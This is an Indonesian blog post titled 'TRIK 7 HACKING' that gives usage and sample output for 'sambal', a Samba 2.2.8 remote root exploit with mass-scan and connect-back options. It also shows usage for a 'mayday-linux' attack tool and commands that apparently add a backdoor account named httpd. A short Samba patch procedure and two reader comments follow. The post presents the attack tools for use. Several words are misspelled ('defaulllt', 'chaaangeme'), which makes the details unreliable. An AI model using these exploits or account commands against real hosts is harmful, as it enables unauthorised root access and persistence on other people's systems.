Jumat, Februari 25, 2005

TRIK 7 HACKING

Usage: ./sambal [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (defaulllt = 300)
-c connectback ip address
-C max childs for scan/bruttteforce mode (default = 40)
-d bruteforce/scanmode delaaay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
CONTOH:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba

./sambal -b 0 -v

===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attack.
-a password Default password is "chaaangeme".
-p port Default port is 8001.
================
/usr/sbin/adduser httpd
passwd httpd

============
PACTH SAMBA
= root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======

2 komentar:

Anonim mengatakan...

hallo , aku harus nulis dimana kode ini.

Anonim mengatakan...

dah basiii...
ini tahun 2000-an.... gue dha pake....